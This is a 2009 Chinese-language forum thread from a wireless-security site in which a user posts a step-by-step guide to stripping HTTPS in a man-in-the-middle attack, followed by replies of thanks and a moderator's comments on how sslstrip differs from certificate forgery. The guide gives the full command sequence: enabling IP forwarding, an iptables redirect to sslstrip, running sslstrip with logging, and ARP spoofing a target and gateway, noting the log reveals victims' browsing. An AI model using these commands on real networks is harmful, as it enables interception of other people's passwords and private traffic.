ubnt解决方案
查看: 8644|回复: 16

[原创] 无线渗透--从外网到内网系列之中间人攻击外传--拿下HTTPS.

[复制链接]

517

回帖

2071

积分

97 小时

在线时间

少校

注册时间
2008-7-29
金币
623 个
威望
86 个
荣誉
25 个

尚未签到

发表于 2009-2-28 14:06 |显示全部楼层
无线渗透--从外网到内网系列之中间人攻击外传--拿下HTTPS.' K& W5 ?. A) k0 l0 M% H
' x7 j' D: W1 M$ g/ U
强烈建议不明OpenSSL, MITM attack为何物的朋友,先看无线渗透--从外网到内网系列之中间人攻击(http://forum.anywlan.com/thread-17045-1-1.html),对MITM attack有了一定了解后在读本文. :) 正如杨哲在文中提到进行中间人攻击可以使得攻击者更有效地截获内网用户的密码及隐秘信息。在BackTrack环境下使用EtterCap or ArpSpoof工具即可. 但Ettercap支持的协议中, 在大部份情况下对仅HTTP、FTP、Telnet、SMTP等以明文传输的协议有效. 对HTTPS这样用了最新OpenSSL版本的就没办法了..... 直到刚在US举行的black hat 2009会上,一老黑发布的名为sslstrip的software,变像的解决了此问题.& g  ?. h3 Y, H+ p% w6 {9 z8 Z1 L

: S5 O0 R! O8 G6 |: B+ U  e- t此软件可在(http://www.thoughtcrime.org/software/sslstrip/index.html)找到. E文ok的朋友还可以看他在Black hat上的精彩演讲. 因sslstrip是用python写成,不用安装也可运行.
7 b1 K4 P+ x0 l5 a2 N1 U6 e  c: q& m' H9 {
用法分为以下几步:6 f1 J( R  ^1 _

* ~+ }6 j4 Z* g7 ~9 k4 M9 q7 K# S/ k1) 用命令 echo "1" > /proc/sys/net/ipv4/ip_forward 将你的机子进入forwarding mode. % r" t. w6 u' Z8 w  V9 a

, C, \3 u  U9 c% s7 Q8 P2) 用命令 iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000 使iptables把所有http数据导入sslstrip.
3 ^" \/ m+ O9 E
) \5 I( e7 Z) D8 X( Y, [3) 运行 sslstrip -a -w ssllog (写入文本)3 E4 w# Q( x: H) D* m$ s

9 {( B* o% U( K4) 运行 arpspoof -i eth0 -t 192.168.1.15 (目标) 192.168.1.1 (网关)6 x3 q( M( s5 z' B+ Q
' @- a8 \* n- a' ~. U
接下来就耐心等待吧! ;) 要提下的是生成的log文件如ssllog其实是html格式的.用konquer可以打开,这样连目标在看的网页面也一清二楚了. 以上均在自个的LAN和BT3下测试完成. 此文是小弟头一回发贴,有不对之处还请大狭们都指正! :)
9 T: c! Z' g5 v  h4 R. Q% Q. t( w$ H; [2 U! ]6 o' _. n! p% A
Prisoner

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有账号?注册 微信登录

x

评分

1

查看全部评分

1517

回帖

4865

积分

358 小时

在线时间

少校

注册时间
2008-6-11
金币
2937 个
威望
31 个
荣誉
7 个

尚未签到

发表于 2009-2-28 14:56 |显示全部楼层
一直想知道破解ssl/tls的工具,改天试试:)
2 Q$ D8 m9 N7 y谢谢楼主分享。
回复

使用道具 举报

34

回帖

101

积分

20 小时

在线时间

上等兵

注册时间
2008-11-6
金币
65 个
威望
0 个
荣誉
0 个

尚未签到

发表于 2009-2-28 15:11 |显示全部楼层
谢谢分享
, {) k- k6 X* n~~
回复

使用道具 举报

229

回帖

2483

积分

114 小时

在线时间

鉴定科成员组

正义勋章

注册时间
2008-7-25
金币
2126 个
威望
7 个
荣誉
6 个
累计签到:1 天
连续签到:0 天
[LV.20]漫游旅程
发表于 2009-2-28 15:15 |显示全部楼层
这个是最前沿了。嘿嘿,SSL,灭了!哈哈哈哈!感谢分享!
回复

使用道具 举报

517

回帖

2071

积分

97 小时

在线时间

少校

注册时间
2008-7-29
金币
623 个
威望
86 个
荣誉
25 个

尚未签到

发表于 2009-3-1 00:04 |显示全部楼层
哈, 不知到实战效果如何. 俺有机会去测试下 ;) 大家也把测试结果发出来吧.
回复

使用道具 举报

1115

回帖

1万

积分

163 小时

在线时间

超级版主

ZerOne无线安全研究组织 Leader

终身荣誉版主杰出会员技术达人终身荣誉会员

注册时间
2006-5-18
金币
7935 个
威望
175 个
荣誉
52 个
累计签到:3 天
连续签到:0 天
[LV.20]漫游旅程
发表于 2009-3-5 14:18 |显示全部楼层
呵呵,才看到,不错的文章,记得07年坛子里朋友也问起过对于SSL的攻击及破解,我还在线给他解释过工具及原理。windows下的Cain就具有SSL证书拦截及伪造功能,可以很简单地伪造证书,但是会弹出提示。
$ q) `2 |- [0 u
5 k, }8 U- X4 D* g1 |而你现在所提及的sslstrip,这个和证书拦截在原理上就是不一样的,Blackhat的报道我看过,这个应该是伪造了SSL小黄锁的图标及预防问页面,严格来说,应该属于钓鱼或者欺骗攻击的一种。而不是正面拦截证书分析及伪造证书的中间人攻击。
- s4 y8 {1 c' I& g7 _/ A# Z- T$ }: y/ S- a- L
哈,感谢楼主的分享和交流,我会在近期跟上一个更详细的教程,来说明。
Hacking is a state of mind......
已陆续编写出版《无线网络安全攻防实战》《无线网络安全攻防实战进阶》等7本无线安全系列书籍,2017新书正在筹备中,感谢支持与肯定
回复

使用道具 举报

76

回帖

433

积分

16 小时

在线时间

少尉

注册时间
2009-2-20
金币
291 个
威望
0 个
荣誉
6 个

尚未签到

发表于 2009-3-5 17:49 |显示全部楼层
感谢共享。
回复

使用道具 举报

10

回帖

21

积分

2 小时

在线时间

新兵上阵

注册时间
2009-2-11
金币
11 个
威望
0 个
荣誉
0 个

尚未签到

发表于 2009-3-11 23:05 |显示全部楼层
It's very great
回复

使用道具 举报

517

回帖

2071

积分

97 小时

在线时间

少校

注册时间
2008-7-29
金币
623 个
威望
86 个
荣誉
25 个

尚未签到

发表于 2009-4-11 01:57 |显示全部楼层
Longas还在等你的下文呢?
回复

使用道具 举报

1万

回帖

11万

积分

3400 小时

在线时间

砖家教授

推广先锋杰出会员技术达人太平绅士灌水天才正义勋章雷锋勋章资深收藏家设备暴发户

注册时间
2009-1-9
金币
97509 个
威望
1496 个
荣誉
14 个
累计签到:2580 天
连续签到:0 天
[LV.2920]超级粉丝
发表于 2009-4-11 22:13 |显示全部楼层
多谢分享.........
回复

使用道具 举报

517

回帖

2071

积分

97 小时

在线时间

少校

注册时间
2008-7-29
金币
623 个
威望
86 个
荣誉
25 个

尚未签到

发表于 2009-4-17 01:12 |显示全部楼层
no probs :)
回复

使用道具 举报

117

回帖

205

积分

144 小时

在线时间

少尉

注册时间
2009-2-28
金币
72 个
威望
0 个
荣誉
0 个

尚未签到

发表于 2009-4-18 13:32 |显示全部楼层
谢谢分享
. t. K. O- Z: T   有空去试试!到时一定来发点效果!
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 注册 微信登录

本版积分规则

站点统计 | Archiver | 手机版 | 无线门户 ( 粤ICP备11076993号|粤公网安备44010602008359号 ) |网站地图

GMT+8, 2025-3-12 17:13

返回顶部 返回列表